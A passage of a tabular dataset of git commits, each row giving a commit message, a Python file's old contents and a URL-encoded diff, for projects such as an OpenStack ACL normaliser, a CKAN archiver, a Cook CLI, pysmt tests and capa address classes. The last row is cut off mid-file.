Dataset schema: commit (string, 40 chars), subject (string, 1–3.25k), old_file (string, 4–311), new_file (string, 4–311), old_contents (string, 0–26.3k), lang (3 classes), proba (float, 0–1), diff (string, 0–7.82k)

| commit | subject | old_file | new_file | old_contents | lang | proba | diff |
|---|---|---|---|---|---|---|---|
480330a116a03ca79172a8646f9001f7f9ee5cad
|
Allow ACL sections to use .*-release group names
|
tools/normalize_acl.py
|
tools/normalize_acl.py
|
#!/usr/bin/env python
# Usage: normalize_acl.py acl.config [transformation [transformation [...]]]
#
# Transformations:
#   all  Apply all transformations.
#   0 - dry run (default, print to stdout rather than modifying file in place)
#   1 - strip/condense whitespace and sort (implied by any other transformation)
#   2 - get rid of unneeded create on refs/tags
#   3 - remove any project.stat{e,us} = active since it's a default or a typo
#   4 - strip default *.owner = group Administrators permissions
#   5 - sort the exclusiveGroupPermissions group lists
#   6 - replace openstack-ci-admins and openstack-ci-core with infra-core
#   7 - add at least one core team, if no team is defined with special suffixes
#       like core, admins, milestone or Users

import re
import sys

aclfile = sys.argv[1]

try:
    transformations = sys.argv[2:]
    if transformations and transformations[0] == 'all':
        transformations = [str(x) for x in range(0, 8)]
except KeyError:
    transformations = []


def tokens(data):
    """Human-order comparison

    This handles embedded positive and negative integers, for sorting
    strings in a more human-friendly order."""
    data = data.replace('.', ' ').split()
    for n in range(len(data)):
        try:
            data[n] = int(data[n])
        except ValueError:
            pass
    return data


acl = {}
out = ''

if '0' in transformations or not transformations:
    dry_run = True
else:
    dry_run = False

aclfd = open(aclfile)
for line in aclfd:
    # condense whitespace to single spaces and get rid of leading/trailing
    line = re.sub('\s+', ' ', line).strip()

    # skip empty lines
    if not line:
        continue

    # this is a section heading
    if line.startswith('['):
        section = line.strip(' []')
        # use a list for this because some options can have the same "key"
        acl[section] = []

    # key=value lines
    elif '=' in line:
        acl[section].append(line)

    # WTF
    else:
        raise Exception('Unrecognized line: "%s"' % line)
aclfd.close()

if '2' in transformations:
    for key in acl:
        if key.startswith('access "refs/tags/'):
            acl[key] = [
                x for x in acl[key]
                if not x.startswith('create = ')]

if '3' in transformations:
    try:
        acl['project'] = [x for x in acl['project'] if x not in
                          ('state = active', 'status = active')]
    except KeyError:
        pass

if '4' in transformations:
    for section in acl.keys():
        acl[section] = [x for x in acl[section] if x !=
                        'owner = group Administrators']

if '5' in transformations:
    for section in acl.keys():
        newsection = []
        for option in acl[section]:
            key, value = [x.strip() for x in option.split('=')]
            if key == 'exclusiveGroupPermissions':
                newsection.append('%s = %s' % (
                    key, ' '.join(sorted(value.split()))))
            else:
                newsection.append(option)
        acl[section] = newsection

if '6' in transformations:
    for section in acl.keys():
        newsection = []
        for option in acl[section]:
            for group in ('openstack-ci-admins', 'openstack-ci-core'):
                option = option.replace('group %s' % group, 'group infra-core')
            newsection.append(option)
        acl[section] = newsection

if '7' in transformations:
    special_projects = (
        'ossa',
        'reviewday',
    )
    special_teams = (
        'admins',
        'committee',
        'core',
        'maint',
        'Managers',
        'milestone',
        'packagers',
        'Users',
    )
    for section in acl.keys():
        newsection = []
        for option in acl[section]:
            if ('refs/heads' in section and 'group' in option
                    and '-2..+2' in option
                    and not any(x in option for x in special_teams)
                    and not any(x in aclfile for x in special_projects)):
                option = '%s%s' % (option, '-core')
            newsection.append(option)
        acl[section] = newsection

for section in sorted(acl.keys()):
    if acl[section]:
        out += '\n[%s]\n' % section
        for option in sorted(acl[section], key=tokens):
            out += '%s\n' % option

if dry_run:
    print(out[1:-1])
else:
    aclfd = open(aclfile, 'w')
    aclfd.write(out[1:])
    aclfd.close()
|
Python
| 0.000004
|
@@ -3626,32 +3626,51 @@
'packagers',%0A
+ 'release',%0A
'Users',
|
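Decoded (the diff column URL-encodes newlines as `%0A`), the hunk above inserts `'release',` into the `special_teams` tuple used by transformation 7, so `.*-release` group names now count as an existing core-like team. A sketch of the resulting tuple:

```python
special_teams = (
    'admins',
    'committee',
    'core',
    'maint',
    'Managers',
    'milestone',
    'packagers',
    'release',   # added by this commit
    'Users',
)
```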
edd9800b807482097edba03d433bb097fd07dae1
|
Add aliases
|
ckanext/archiver/model.py
|
ckanext/archiver/model.py
|
from builtins import str
from builtins import object
import uuid
from datetime import datetime

from sqlalchemy import Column, MetaData
from sqlalchemy import types
from sqlalchemy.ext.declarative import declarative_base

import ckan.model as model
import ckan.plugins as p
from ckan.lib import dictization

log = __import__('logging').getLogger(__name__)

Base = declarative_base()


def make_uuid():
    return str(uuid.uuid4())


metadata = MetaData()


# enum of all the archival statuses (singleton)
# NB Be very careful changing these status strings. They are also used in
# ckanext-qa tasks.py.
class Status(object):
    _instance = None

    def __init__(self):
        not_broken = {
            # is_broken = False
            0: 'Archived successfully',
            1: 'Content has not changed',
        }
        broken = {
            # is_broken = True
            10: 'URL invalid',
            11: 'URL request failed',
            12: 'Download error',
        }
        not_sure = {
            # is_broken = None i.e. not sure
            21: 'Chose not to download',
            22: 'Download failure',
            23: 'System error during archival',
        }
        self._by_id = dict(not_broken, **broken)
        self._by_id.update(not_sure)
        self._by_text = dict((value, key)
                             for key, value in self._by_id.items())

    @classmethod
    def instance(cls):
        if not cls._instance:
            cls._instance = cls()
        return cls._instance

    @classmethod
    def by_text(cls, status_txt):
        return cls.instance()._by_text[status_txt]

    @classmethod
    def by_id(cls, status_id):
        return cls.instance()._by_id[status_id]

    @classmethod
    def is_status_broken(cls, status_id):
        if status_id < 10:
            return False
        elif status_id < 20:
            return True
        else:
            return None  # not sure

    @classmethod
    def is_ok(cls, status_id):
        return status_id in [0, 1]


broken_enum = {True: 'Broken',
               None: 'Not sure if broken',
               False: 'Downloaded OK'}


class Archival(Base):
    """
    Details of the archival of resources. Has the filepath for successfully
    archived resources. Basic error history provided for unsuccessful ones.
    """
    __tablename__ = 'archival'

    id = Column(types.UnicodeText, primary_key=True, default=make_uuid)
    package_id = Column(types.UnicodeText, nullable=False, index=True)
    resource_id = Column(types.UnicodeText, nullable=False, index=True)
    resource_timestamp = Column(types.DateTime)  # key to resource_revision

    # Details of the latest archival attempt
    status_id = Column(types.Integer)
    is_broken = Column(types.Boolean)  # Based on status_id. None = not sure
    reason = Column(types.UnicodeText)  # Extra detail explaining the status (cannot be translated)
    url_redirected_to = Column(types.UnicodeText)

    # Details of last successful archival
    cache_filepath = Column(types.UnicodeText)
    cache_url = Column(types.UnicodeText)
    size = Column(types.BigInteger, default=0)
    mimetype = Column(types.UnicodeText)
    hash = Column(types.UnicodeText)
    etag = Column(types.UnicodeText)
    last_modified = Column(types.UnicodeText)

    # History
    first_failure = Column(types.DateTime)
    last_success = Column(types.DateTime)
    failure_count = Column(types.Integer, default=0)

    created = Column(types.DateTime, default=datetime.now)
    updated = Column(types.DateTime)

    def __repr__(self):
        broken_details = '' if not self.is_broken else \
            ('%d failures' % self.failure_count)
        package = model.Package.get(self.package_id)
        package_name = package.name if package else '?%s?' % self.package_id
        return '<Archival %s /dataset/%s/resource/%s %s>' % \
            (broken_enum[self.is_broken], package_name, self.resource_id,
             broken_details)

    @classmethod
    def get_for_resource(cls, resource_id):
        '''Returns the archival for the given resource, or if it doesn't exist,
        returns None.'''
        return model.Session.query(cls).filter(cls.resource_id == resource_id).first()

    @classmethod
    def get_for_package(cls, package_id):
        '''Returns the archivals for the given package. May not be any if the
        package has no resources or has not been archived. It checks the
        resources are not deleted.'''
        return model.Session.query(cls) \
            .filter(cls.package_id == package_id) \
            .join(model.Resource, cls.resource_id == model.Resource.id) \
            .filter(model.Resource.state == 'active') \
            .all()

    @classmethod
    def create(cls, resource_id):
        c = cls()
        c.resource_id = resource_id

        # Find the package_id for the resource.
        dataset = model.Session.query(model.Package)
        if p.toolkit.check_ckan_version(max_version='2.2.99'):
            # earlier CKANs had ResourceGroup
            dataset = dataset.join(model.ResourceGroup)
        dataset = dataset \
            .join(model.Resource) \
            .filter_by(id=resource_id) \
            .one()
        c.package_id = dataset.id
        return c

    @property
    def status(self):
        if self.status_id is None:
            return None
        return Status.by_id(self.status_id)

    def as_dict(self):
        context = {'model': model}
        archival_dict = dictization.table_dictize(self, context)
        archival_dict['status'] = self.status
        archival_dict['is_broken_printable'] = broken_enum[self.is_broken]
        return archival_dict


def aggregate_archivals_for_a_dataset(archivals):
    '''Returns aggregated archival info for a dataset, given the archivals for
    its resources (returned by get_for_package).

    :param archivals: A list of the archivals for a dataset's resources
    :type archivals: A list of Archival objects

    :returns: Archival dict about the dataset, with keys:
              status_id
              status
              reason
              is_broken
    '''
    archival_dict = {'status_id': None, 'status': None,
                     'reason': None, 'is_broken': None}
    for archival in archivals:
        # status_id takes the highest id i.e. pessimistic
        # reason matches the status_id
        if archival_dict['status_id'] is None or \
                archival.status_id > archival_dict['status_id']:
            archival_dict['status_id'] = archival.status_id
            archival_dict['reason'] = archival.reason
    if archivals:
        archival_dict['status'] = Status.by_id(archival_dict['status_id'])
        archival_dict['is_broken'] = \
            Status.is_status_broken(archival_dict['status_id'])
    return archival_dict


def init_tables(engine):
    Base.metadata.create_all(engine)
    log.info('Archiver database tables are set-up')
|
Python
| 0.000033
|
@@ -1,28 +1,108 @@
+from future import standard_library%0Astandard_library.install_aliases() # noqa%0A%0A
from builtins import str%0Afro
|
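Decoded, this hunk prepends the python-future standard-library aliasing ahead of the existing `builtins` imports, so the new module header would start:

```python
from future import standard_library
standard_library.install_aliases()  # noqa

from builtins import str
from builtins import object
```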
a5a25c180f2df13c387c56be938b3ecad2a50aaa
|
use action='version' in --version parser (#891)
|
cli/cook/cli.py
|
cli/cook/cli.py
|
import argparse
import logging

from urllib.parse import urlparse

from cook import util, http, metrics, version, configuration
from cook.subcommands import submit, show, wait, jobs, ssh, ls, tail, kill, config, cat, usage
from cook.util import deep_merge

parser = argparse.ArgumentParser(description='cs is the Cook Scheduler CLI')
parser.add_argument('--cluster', '-c', help='the name of the Cook scheduler cluster to use')
parser.add_argument('--url', '-u', help='the url of the Cook scheduler cluster to use')
parser.add_argument('--config', '-C', help='the configuration file to use')
parser.add_argument('--silent', '-s', help='silent mode', dest='silent', action='store_true')
parser.add_argument('--verbose', '-v', help='be more verbose/talkative (useful for debugging)',
                    dest='verbose', action='store_true')
parser.add_argument('--version', help='output version information and exit', dest='version', action='store_true')

subparsers = parser.add_subparsers(dest='action')

actions = {
    'cat': cat.register(subparsers.add_parser, configuration.add_defaults),
    'config': config.register(subparsers.add_parser, configuration.add_defaults),
    'jobs': jobs.register(subparsers.add_parser, configuration.add_defaults),
    'kill': kill.register(subparsers.add_parser, configuration.add_defaults),
    'ls': ls.register(subparsers.add_parser, configuration.add_defaults),
    'show': show.register(subparsers.add_parser, configuration.add_defaults),
    'ssh': ssh.register(subparsers.add_parser, configuration.add_defaults),
    'submit': submit.register(subparsers.add_parser, configuration.add_defaults),
    'tail': tail.register(subparsers.add_parser, configuration.add_defaults),
    'usage': usage.register(subparsers.add_parser, configuration.add_defaults),
    'wait': wait.register(subparsers.add_parser, configuration.add_defaults)
}


def load_target_clusters(config_map, url=None, cluster=None):
    """Given the config and (optional) url and cluster flags, returns the list of clusters to target"""
    if cluster and url:
        raise Exception('You cannot specify both a cluster name and a cluster url at the same time')

    clusters = None
    config_clusters = config_map.get('clusters')
    if url:
        if urlparse(url).scheme == '':
            url = 'http://%s' % url
        clusters = [{'name': url, 'url': url}]
    elif config_clusters:
        if cluster:
            clusters = [c for c in config_clusters if c.get('name').lower() == cluster.lower()]
        else:
            clusters = [c for c in config_clusters if 'disabled' not in c or not c['disabled']]

    return clusters


def run(args):
    """
    Main entrypoint to the cook scheduler CLI. Loads configuration files,
    processes global command line arguments, and calls other command line
    sub-commands (actions) if necessary.
    """
    args = vars(parser.parse_args(args))

    print_version = args.pop('version')
    if print_version:
        print(f'cs version {version.VERSION}')
        return 0

    util.silent = args.pop('silent')
    verbose = args.pop('verbose') and not util.silent

    log_format = '%(asctime)s [%(levelname)s] [%(name)s] %(message)s'
    if verbose:
        logging.getLogger('').handlers = []
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    else:
        logging.disable(logging.FATAL)

    logging.debug('args: %s' % args)

    action = args.pop('action')
    config_path = args.pop('config')
    cluster = args.pop('cluster')
    url = args.pop('url')

    if action is None:
        parser.print_help()
    else:
        config_map = configuration.load_config_with_defaults(config_path)
        try:
            metrics.initialize(config_map)
            metrics.inc('command.%s.runs' % action)
            clusters = load_target_clusters(config_map, url, cluster)
            http.configure(config_map)
            args = {k: v for k, v in args.items() if v is not None}
            defaults = config_map.get('defaults')
            action_defaults = (defaults.get(action) if defaults else None) or {}
            result = actions[action](clusters, deep_merge(action_defaults, args), config_path)
            logging.debug('result: %s' % result)
            return result
        finally:
            metrics.close()

    return None
|
Python
| 0
|
@@ -910,22 +910,73 @@
it',
- dest='version
+%0A version=f'%25(prog)s version %7Bversion.VERSION%7D
', a
@@ -982,26 +982,23 @@
action='
-store_true
+version
')%0A%0Asubp
@@ -2957,135 +2957,8 @@
))%0A%0A
- print_version = args.pop('version')%0A if print_version:%0A print(f'cs version %7Bversion.VERSION%7D')%0A return 0%0A%0A
|
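Decoded, the first two hunks swap the hand-rolled `store_true` flag for argparse's built-in version action, and the third deletes the manual `print_version` block from `run()`, since argparse now prints the version and exits on its own. The new flag registration would read:

```python
parser.add_argument('--version', help='output version information and exit',
                    version=f'%(prog)s version {version.VERSION}', action='version')
```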
94aed149fd39ba9a6dd6fcf5dcc44c6e4f2a09b9
|
fix imports
|
website_sale_search_clear/controllers.py
|
website_sale_search_clear/controllers.py
|
# -*- coding: utf-8 -*-
from openerp import http
from openerp.addons.website_sale.controllers.main import website_sale as controller


class WebsiteSale(controller):

    @http.route()
    def shop(self, page=0, category=None, search='', **post):
        if category and search:
            category = None
        return super(WebsiteSale, self).shop(page, category, search, **post)
|
Python
| 0.000004
|
@@ -23,22 +23,19 @@
-%0Afrom o
-penerp
+doo
import
@@ -49,14 +49,11 @@
om o
-penerp
+doo
.add
@@ -93,25 +93,24 @@
import
-w
+W
ebsite
-_s
+S
ale as c
|
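Decoded, the hunks rename the `openerp` package to `odoo` and correct the imported controller class name, so the import block would become:

```python
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale as controller
```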
24a1bb4fed640a61caa1613cfe4da29a530a8efc
|
Fix encoding issue on Harvest Config validation
|
udata/harvest/forms.py
|
udata/harvest/forms.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _

from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED

__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'


class HarvestConfigField(fields.DictField):
    '''
    A DictField with extras validations on known configurations
    '''
    def get_backend(self, form):
        return next(b for b in list_backends() if b.name == form.backend.data)

    def get_filter_specs(self, backend, key):
        candidates = (f for f in backend.filters if f.key == key)
        return next(candidates, None)

    def get_feature_specs(self, backend, key):
        candidates = (f for f in backend.features if f.key == key)
        return next(candidates, None)

    def pre_validate(self, form):
        if self.data:
            backend = self.get_backend(form)
            # Validate filters
            for f in (self.data.get('filters') or []):
                if not ('key' in f and 'value' in f):
                    msg = 'A field should have both key and value properties'
                    raise validators.ValidationError(msg)
                specs = self.get_filter_specs(backend, f['key'])
                if not specs:
                    msg = 'Unknown filter key "{0}" for "{1}" backend'
                    msg = msg.format(f['key'], backend.name)
                    raise validators.ValidationError(msg)
                if not isinstance(f['value'], specs.type):
                    msg = '"{0}" filter should of type "{1}"'
                    msg = msg.format(specs.key, specs.type.__name__)
                    raise validators.ValidationError(msg)
            # Validate features
            for key, value in (self.data.get('features') or {}).items():
                if not isinstance(value, bool):
                    msg = 'A feature should be a boolean'
                    raise validators.ValidationError(msg)
                if not self.get_feature_specs(backend, key):
                    msg = 'Unknown feature "{0}" for "{1}" backend'
                    msg = msg.format(key, backend.name)
                    raise validators.ValidationError(msg)


class HarvestSourceForm(Form):
    name = fields.StringField(_('Name'), [validators.required()])
    description = fields.MarkdownField(
        _('Description'),
        description=_('Some optionnal details about this harvester'))
    url = fields.URLField(_('URL'), [validators.required()])
    backend = fields.SelectField(_('Backend'), choices=lambda: [
        (b.name, b.display_name) for b in list_backends()
    ])
    owner = fields.CurrentUserField()
    organization = fields.PublishAsField(_('Publish as'))
    config = HarvestConfigField()


class HarvestSourceValidationForm(Form):
    state = fields.SelectField(choices=VALIDATION_STATES.items())
    comment = fields.StringField(_('Comment'),
                                 [validators.RequiredIfVal('state',
                                                           VALIDATION_REFUSED
                                                           )])
|
Python
| 0
|
@@ -1502,32 +1502,110 @@
ationError(msg)%0A
+%0A f%5B'value'%5D = f%5B'value'%5D.encode('utf-8') #Fix encoding error%0A%0A
|
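Decoded, the hunk inserts a single line into `HarvestConfigField.pre_validate`; going by the character offset, it lands after the filter-type check, forcing each validated filter value to UTF-8 bytes:

```python
                if not isinstance(f['value'], specs.type):
                    msg = '"{0}" filter should of type "{1}"'
                    msg = msg.format(specs.key, specs.type.__name__)
                    raise validators.ValidationError(msg)

                f['value'] = f['value'].encode('utf-8')  # Fix encoding error
```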
683ccc69c51a64146dda838ad01674ca3b95fccd
|
Remove useless hearing comments router
|
democracy/urls_v1.py
|
democracy/urls_v1.py
|
from django.conf.urls import include, url
from rest_framework_nested import routers

from democracy.views import (
    CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
    RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)

router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')

hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')

hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')

section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')

urlpatterns = [
    url(r'^', include(router.urls, namespace='v1')),
    url(r'^', include(hearing_comments_router.urls, namespace='v1')),
    url(r'^', include(hearing_child_router.urls, namespace='v1')),
    url(r'^', include(section_comments_router.urls, namespace='v1')),
    url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
|
Python
| 0
|
@@ -943,107 +943,8 @@
')%0A%0A
-hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')%0A%0A
hear
@@ -1387,78 +1387,8 @@
)),%0A
- url(r'%5E', include(hearing_comments_router.urls, namespace='v1')),%0A
|
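Decoded, the two hunks delete the never-registered `hearing_comments_router` and its `url()` include; the remaining wiring would be:

```python
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')

section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')

urlpatterns = [
    url(r'^', include(router.urls, namespace='v1')),
    url(r'^', include(hearing_child_router.urls, namespace='v1')),
    url(r'^', include(section_comments_router.urls, namespace='v1')),
    url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
```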
1c789f0cfbc9384c256a55343f3172b628e55a12
|
Add test case for parser consume
|
pysmt/test/smtlib/test_parser_examples.py
|
pysmt/test/smtlib/test_parser_examples.py
|
#
# This file is part of pySMT.
#
# Copyright 2014 Andrea Micheli and Marco Gario
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from tempfile import mkstemp

from six.moves import cStringIO

import pysmt.logics as logics
from pysmt.test import TestCase, skipIfNoSolverForLogic, main
from pysmt.test.examples import get_example_formulae
from pysmt.smtlib.parser import SmtLibParser
from pysmt.smtlib.script import smtlibscript_from_formula
from pysmt.shortcuts import Iff
from pysmt.shortcuts import read_smtlib, write_smtlib
from pysmt.exceptions import PysmtSyntaxError


class TestSMTParseExamples(TestCase):

    def test_parse_examples(self):
        fs = get_example_formulae()

        for (f_out, _, _, logic) in fs:
            if logic == logics.QF_BV:
                # See test_parse_examples_bv
                continue
            buf = cStringIO()
            script_out = smtlibscript_from_formula(f_out)
            script_out.serialize(outstream=buf)
            #print(buf)

            buf.seek(0)
            parser = SmtLibParser()
            script_in = parser.get_script(buf)
            f_in = script_in.get_last_formula()
            self.assertEqual(f_in.simplify(), f_out.simplify())

    @skipIfNoSolverForLogic(logics.QF_BV)
    def test_parse_examples_bv(self):
        """For BV we represent a superset of the operators defined in SMT-LIB.

        We verify the correctness of the serialization process by
        checking the equivalence of the original and serialized
        expression.
        """
        fs = get_example_formulae()

        for (f_out, _, _, logic) in fs:
            if logic != logics.QF_BV:
                continue
            buf_out = cStringIO()
            script_out = smtlibscript_from_formula(f_out)
            script_out.serialize(outstream=buf_out)

            buf_in = cStringIO(buf_out.getvalue())
            parser = SmtLibParser()
            script_in = parser.get_script(buf_in)
            f_in = script_in.get_last_formula()

            self.assertValid(Iff(f_in, f_out))

    def test_parse_examples_daggified(self):
        fs = get_example_formulae()

        for (f_out, _, _, logic) in fs:
            if logic == logics.QF_BV:
                # See test_parse_examples_daggified_bv
                continue
            buf_out = cStringIO()
            script_out = smtlibscript_from_formula(f_out)
            script_out.serialize(outstream=buf_out, daggify=True)
            buf_in = cStringIO(buf_out.getvalue())
            parser = SmtLibParser()
            script_in = parser.get_script(buf_in)
            f_in = script_in.get_last_formula()
            self.assertEqual(f_in.simplify(), f_out.simplify())

    @skipIfNoSolverForLogic(logics.QF_BV)
    def test_parse_examples_daggified_bv(self):
        fs = get_example_formulae()

        for (f_out, _, _, logic) in fs:
            if logic != logics.QF_BV:
                # See test_parse_examples_daggified
                continue
            buf_out = cStringIO()
            script_out = smtlibscript_from_formula(f_out)
            script_out.serialize(outstream=buf_out, daggify=True)
            buf_in = cStringIO(buf_out.getvalue())
            parser = SmtLibParser()
            script_in = parser.get_script(buf_in)
            f_in = script_in.get_last_formula()
            self.assertValid(Iff(f_in, f_out), f_in.serialize())

    def test_dumped_logic(self):
        # Dumped logic matches the logic in the example
        fs = get_example_formulae()

        for (f_out, _, _, logic) in fs:
            buf_out = cStringIO()
            script_out = smtlibscript_from_formula(f_out)
            script_out.serialize(outstream=buf_out)
            buf_in = cStringIO(buf_out.getvalue())
            parser = SmtLibParser()
            script_in = parser.get_script(buf_in)
            for cmd in script_in:
                if cmd.name == "set-logic":
                    logic_in = cmd.args[0]
                    if logic == logics.QF_BOOL:
                        self.assertEqual(logic_in, logics.QF_UF)
                    elif logic == logics.BOOL:
                        self.assertEqual(logic_in, logics.LRA)
                    else:
                        self.assertEqual(logic_in, logic, script_in)
                    break
            else:  # Loops exited normally
                print("-"*40)
                print(script_in)

    def test_read_and_write_shortcuts(self):
        fs = get_example_formulae()

        fdi, tmp_fname = mkstemp()
        os.close(fdi)  # Close initial file descriptor
        for (f_out, _, _, _) in fs:
            write_smtlib(f_out, tmp_fname)
            # with open(tmp_fname) as fin:
            #     print(fin.read())
            f_in = read_smtlib(tmp_fname)
            self.assertEqual(f_out.simplify(), f_in.simplify())
        # Clean-up
        os.remove(tmp_fname)

    def test_incomplete_stream(self):
        txt = """
        (declare-fun A () Bool)
        (declare-fun B () Bool)
        (assert (and A
        """
        parser = SmtLibParser()
        with self.assertRaises(PysmtSyntaxError):
            parser.get_script(cStringIO(txt))


if __name__ == "__main__":
    main()
|
Python
| 0.000001
|
@@ -905,16 +905,27 @@
ibParser
+, Tokenizer
%0Afrom py
@@ -5716,16 +5716,442 @@
(txt))%0A%0A
+ def test_parse_consume(self):%0A smt_script = %22%22%22%0A (model%0A (define-fun STRING_cmd_line_arg_1_1000 () String %22AAAAAAAAAAAA%22)%0A )%0A %22%22%22%0A tokens = Tokenizer(cStringIO(smt_script), interactive=True)%0A parser = SmtLibParser()%0A tokens.consume()%0A tokens.consume()%0A next_token = tokens.consume()%0A tokens.add_extra_token(next_token)%0A tokens.consume()%0A%0A
if __nam
|
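Decoded, the first hunk extends the parser import with `Tokenizer`, and the second appends a new test exercising `Tokenizer.consume()` and `add_extra_token()` on an interactive stream; the added code would read:

```python
from pysmt.smtlib.parser import SmtLibParser, Tokenizer

# new method appended to TestSMTParseExamples:
    def test_parse_consume(self):
        smt_script = """
        (model
        (define-fun STRING_cmd_line_arg_1_1000 () String "AAAAAAAAAAAA")
        )
        """
        tokens = Tokenizer(cStringIO(smt_script), interactive=True)
        parser = SmtLibParser()
        tokens.consume()
        tokens.consume()
        next_token = tokens.consume()
        tokens.add_extra_token(next_token)
        tokens.consume()
```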
ad153499a3982182533033acfa17971a35d7a587
|
implement __eq__
|
capa/features/address.py
|
capa/features/address.py
|
import abc

from dncil.clr.token import Token


class Address(abc.ABC):
    @abc.abstractmethod
    def __lt__(self, other):
        # implement < so that addresses can be sorted from low to high
        ...

    @abc.abstractmethod
    def __hash__(self):
        # implement hash so that addresses can be used in sets and dicts
        ...

    @abc.abstractmethod
    def __repr__(self):
        # implement repr to help during debugging
        ...


class AbsoluteVirtualAddress(int, Address):
    """an absolute memory address"""
    def __new__(cls, v):
        assert v >= 0
        return int.__new__(cls, v)

    def __repr__(self):
        return f"absolute(0x{self:x})"


class RelativeVirtualAddress(int, Address):
    """a memory address relative to a base address"""
    def __repr__(self):
        return f"relative(0x{self:x})"


class FileOffsetAddress(int, Address):
    """an address relative to the start of a file"""
    def __new__(cls, v):
        assert v >= 0
        return int.__new__(cls, v)

    def __repr__(self):
        return f"file(0x{self:x})"


class DNTokenAddress(Address):
    """a .NET token"""
    def __init__(self, token: Token):
        self.token = token

    def __lt__(self, other):
        return self.token.value < other.token.value

    def __hash__(self):
        return hash(self.token.value)

    def __repr__(self):
        return f"token(0x{self.token.value:x})"


class DNTokenOffsetAddress(Address):
    """an offset into an object specified by a .NET token"""
    def __init__(self, token: Token, offset: int):
        assert offset >= 0
        self.token = token
        self.offset = offset

    def __lt__(self, other):
        return (self.token.value, self.offset) < (other.token.value, other.offset)

    def __hash__(self):
        return hash((self.token.value, self.offset))

    def __repr__(self):
        return f"token(0x{self.token.value:x})+(0x{self.offset:x})"


class _NoAddress(Address):
    def __lt__(self, other):
        return False

    def __hash__(self):
        return hash(0)

    def __repr__(self):
        return "no address"


NO_ADDRESS = _NoAddress()
|
Python
| 0.00008
|
@@ -65,16 +65,82 @@
c.ABC):%0A
+ @abc.abstractmethod%0A def __eq__(self, other):%0A ...%0A%0A
@abc
@@ -1266,16 +1266,99 @@
token%0A%0A
+ def __eq__(self, other):%0A return self.token.value == other.token.value%0A%0A
def
@@ -1370,32 +1370,32 @@
_(self, other):%0A
-
return s
@@ -1802,16 +1802,130 @@
offset%0A%0A
+ def __eq__(self, other):%0A return (self.token.value, self.offset) == (other.token.value, other.offset)%0A%0A
def
@@ -2197,24 +2197,24 @@
fset:x%7D)%22%0A%0A%0A
-
class _NoAdd
@@ -2224,24 +2224,74 @@
s(Address):%0A
+ def __eq__(self, other):%0A return True%0A%0A
def __lt
|
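Decoded, the hunks add an abstract `__eq__` to `Address` plus concrete implementations for the token-based classes and a trivially-true one for `_NoAddress`; the `int` subclasses already satisfy the abstract method via `int.__eq__`. The additions would read:

```python
class Address(abc.ABC):
    @abc.abstractmethod
    def __eq__(self, other):
        ...

class DNTokenAddress(Address):
    def __eq__(self, other):
        return self.token.value == other.token.value

class DNTokenOffsetAddress(Address):
    def __eq__(self, other):
        return (self.token.value, self.offset) == (other.token.value, other.offset)

class _NoAddress(Address):
    def __eq__(self, other):
        return True
```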
e660953c1df2dc9de6b3038e4ddb1d77768b2b51
|
Correct pyhande dependencies (broken for some time)
|
tools/pyhande/setup.py
|
tools/pyhande/setup.py
|
from distutils.core import setup

setup(
    name='pyhande',
    version='0.1',
    author='HANDE developers',
    packages=('pyhande',),
    license='Modified BSD license',
    description='Analysis framework for HANDE calculations',
    long_description=open('README.rst').read(),
    requires=['numpy', 'pandas (>= 0.13)', 'pyblock',],
)
|
Python
| 0
|
@@ -280,16 +280,24 @@
(),%0A
+install_
requires
@@ -312,37 +312,49 @@
', '
-pandas (%3E= 0.13)', 'pyblock',
+scipy', 'pandas', 'pyblock', 'matplotlib'
%5D,%0A)
|
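Decoded, the hunks replace the distutils-style `requires` (which pip ignores) with setuptools-style `install_requires`, dropping the pandas pin and adding scipy and matplotlib:

```python
install_requires=['numpy', 'scipy', 'pandas', 'pyblock', 'matplotlib'],
```

Note the file still imports `setup` from `distutils.core`; `install_requires` only takes effect when setuptools is active, which is presumably the environment assumed here.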
5aa16a2ebc8f13980534b5f530cd68a0c04c4c55
|
Fix failing test
|
nefertari_mongodb/tests/test_documents.py
|
nefertari_mongodb/tests/test_documents.py
|
import pytest
from mock import patch, Mock
import mongoengine as mongo

from nefertari.utils.dictset import dictset
from nefertari.json_httpexceptions import (
    JHTTPBadRequest, JHTTPNotFound, JHTTPConflict)

from .. import documents as docs
from .. import fields


class TestDocumentHelpers(object):

    @patch.object(docs.mongo.document, 'get_document')
